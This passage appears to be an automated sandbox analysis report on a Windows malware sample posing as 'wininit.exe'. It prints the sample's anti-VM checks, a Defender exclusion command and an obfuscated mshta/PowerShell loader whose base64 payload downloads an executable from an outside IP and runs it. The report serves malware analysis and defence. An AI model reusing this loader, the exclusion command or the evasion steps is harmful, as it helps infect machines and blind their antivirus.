            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: Yara matchFile source: Process Memory Space: wininit.exe PID: 4416, type: MEMORYSTR
            Source: C:\Users\user\AppData\Roaming\wininit.exeMemory allocated: 24D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeMemory allocated: 2560000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeMemory allocated: 4560000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeMemory allocated: 73C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeMemory allocated: 83C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeMemory allocated: 8570000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeMemory allocated: 9570000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3282Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6466Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7945Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1662Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7306Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2326Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sg2bcrbf\sg2bcrbf.dllJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2720Thread sleep time: -15679732462653109s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4296Thread sleep count: 7945 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4296Thread sleep count: 1662 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1460Thread sleep time: -8301034833169293s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exe TID: 1544Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\svchost.exe TID: 6728Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2416Thread sleep count: 7306 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6108Thread sleep count: 2326 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4900Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exe TID: 3744Thread sleep time: -240000s >= -30000s
            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
            Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
            Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
            Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
            Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
            Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 9_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,9_2_00403D74
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeThread delayed: delay time: 60000
            Source: powershell.exe, 00000003.00000002.1701805995.0000000005506000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
            Source: powershell.exe, 00000003.00000002.1704660304.0000000007AD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MSFT_NetEventVmNetworkAdatper.cdxmlon
            Source: powershell.exe, 00000003.00000002.1701805995.0000000005506000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
            Source: powershell.exe, 00000003.00000002.1704660304.0000000007AD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .MSFT_NetEventVmNetworkAdatper.format.ps1xmltN
            Source: powershell.exe, 00000001.00000002.1825901541.000000000787F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1827355546.00000000078CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2883912187.0000024C1B454000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2882583070.0000024C15E2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: powershell.exe, 00000001.00000002.1825901541.00000000078A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
            Source: wininit.exe, 00000006.00000002.1789826206.00000000007D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\
            Source: powershell.exe, 00000003.00000002.1701805995.0000000005506000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
            Source: wininit.exe, 00000009.00000002.2881596868.0000000000948000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllC
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 9_2_0040317B mov eax, dword ptr fs:[00000030h]9_2_0040317B
            Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 9_2_00402B7C GetProcessHeap,RtlAllocateHeap,9_2_00402B7C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Roaming\wininit.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe"
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeMemory written: C:\Users\user\AppData\Roaming\wininit.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNtJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sg2bcrbf\sg2bcrbf.cmdline"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\wininit.exe "C:\Users\user\AppData\Roaming\wininit.exe"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBF21.tmp" "c:\Users\user\AppData\Local\Temp\sg2bcrbf\CSC9DC7DEFBB3DB4CF88431EEB79FD9B6EB.TMP"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess created: C:\Users\user\AppData\Roaming\wininit.exe "C:\Users\user\AppData\Roaming\wininit.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jgozckggicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagyurelxr5ueugicagicagicagicagicagicagicagicagicagicagicattuvtymvyzgvgsw5pvelptiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ukxnb04urgxsiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagte9etwxjwuzirixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbltyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbmcmqsdwludcagicagicagicagicagicagicagicagicagicagicagigtdtxyssw50uhryicagicagicagicagicagicagicagicagicagicagicagc0t3afnvz0zkktsnicagicagicagicagicagicagicagicagicagicagicaglw5htuugicagicagicagicagicagicagicagicagicagicagicaiuetkbwrxiiagicagicagicagicagicagicagicagicagicagicagic1oyw1lu3bhy2ugicagicagicagicagicagicagicagicagicagicagicbmwvbocgzavmggicagicagicagicagicagicagicagicagicagicagicatugfz